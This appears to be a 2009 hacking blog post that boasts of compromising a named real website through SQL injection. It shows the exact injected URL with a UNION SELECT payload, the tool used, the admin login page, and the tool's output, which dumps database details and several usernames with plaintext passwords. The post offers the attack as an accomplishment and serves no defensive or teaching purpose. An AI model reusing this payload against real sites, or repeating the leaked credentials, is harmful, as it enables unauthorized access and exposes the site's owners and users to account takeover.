viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, January 17, 2009

[SQLi] http://www.koranslawi.com

12:46 AM Posted by viperfx07 No comments


Another site using QB Headlines. koranslawi.com hacked using sql injection

Tool = schemafuzz.py v5.0
Admin page = http://koranslawi.com/admin/
Admin usr:pwd = admin:qbpwd


[+] URL: http://koranslawi.com/index.php?cat=2+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 23:46:30
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: korans3_koranslawi
User: korans3_dj4far@localhost
Version: 4.1.22-standard
[+] Dumping data from database "korans3_koranslawi" Table "user"
[+] and Column(s) ['uname', 'pwd']
[+] Number of Rows: 3

[0] admin:qbpwd:
[1] invest:invest:
[2] adminos:admin:
[3] No data

[-] 23:46:39
[-] Total URL Requests 5
[-] Done

0 comments:

Post a Comment